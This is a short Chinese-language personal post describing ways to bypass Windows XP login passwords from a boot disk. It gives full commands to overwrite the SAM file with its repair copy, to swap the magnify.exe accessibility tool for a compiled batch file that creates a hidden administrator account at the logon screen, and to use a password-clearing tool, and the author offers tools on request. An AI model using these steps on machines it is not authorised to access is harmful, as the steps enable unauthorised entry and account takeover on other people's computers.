破解系统密码的常用的几种方法
---流血的蚊子(个人实验加整理)
以下几种方法都需要Dos环境或者winpe环境,所以需要自己制作启动盘(具体方法不多言)
1、 SAM文件。Windows xp目录C:/WINDOWS/system32/config下存在一个记录账户密码的文件SAM,在windows2000下这个文件可以直接删除,但是在XP系统下删除会造成系统崩溃。这里解决方式是:在C:/WINDOWS/repair目录下存在一个初始的SAM文件,用于系统修复SAM文件使用,通过U盘启动,进入dos命令行下 copy C:/WINDOWS/repair/SAM C:/windows/system32/config/SAM 即可,重启系统应该就可以了,此时的administrator是空密码状态。(此方法我较少使用,因为有一定几率会出现系统崩溃,所以不推荐使用)
2、 替换系统文件.我这里以magnify.exe为例,这个文件的路径是在C:/WINDOWS/system32目录下,这是一个为xp系统的辅助工具放大镜。可以通过系统的win+u快捷键调取。
首先写一个批处理代码如下:
@echo off
Net user test test /add #添加一个用户,用户名为test,密码也为test
Net localgroup administrators test /add #加上面添加的用户加到管理员组里面
将文件保存为test.bat,可以通过批处理潜行者(bat to exe 工具)将test.bat转化为exe文件,并更名为magnify.exe.并将这个文件保存在U盘中(之前就需要制作好,可以一直随身带着)
下面是正文:
通过U盘启动,进入dos下(也可以进入winpe图形化替换),执行如下命令
Cd /d c:/windows/system32 #进入c:/windows/system32目录
Ren magnify.exe magnify_bak.exe #备份magnify.exe文件
Copy u盘中magnify.exe存放的目录/magnify.exe c:/windows/system32/magnify.exe
现在可以重新启动系统
待到进入到用户登录的界面时,按两下win+u键,运行magnify.exe文件,此时就已在系统添加了test账户,此时按ctrl+alt+del两次即可进入经典的登录界面,此时输入用户test,密码test即可完成登录。如果想要去掉这个账户,参照上面的方法,只不过批处理的代码为net user test /del .另外你可以用test登录系统后,用net user命令查看系统有哪些用户,如存在administraor用户,可以执行net user administrator /add ,此时administrator密码被置为空,注销用administrator登录,执行net user test /del即可删除掉test用户。
另外有其他的替换方法:比如说替换屏保文件logon.scr,但是需要系统开启屏保功能,即使开启的话,默认也是需要等待10分钟。
3、 其他工具:我这里以PWD_CHNG.exe为例,这应用程序是从PwdChangerPro-Setup.EXE提取出来的。在dos下运行此文件即可,可以选择擦除掉那个用户的系统密码,后用这个账户登录即可。
欢迎各位达人与我交流,各种工具需要也可与我联系
。 QQ:350614829
Email:drefong@gmail.com
流血的蚊子 武汉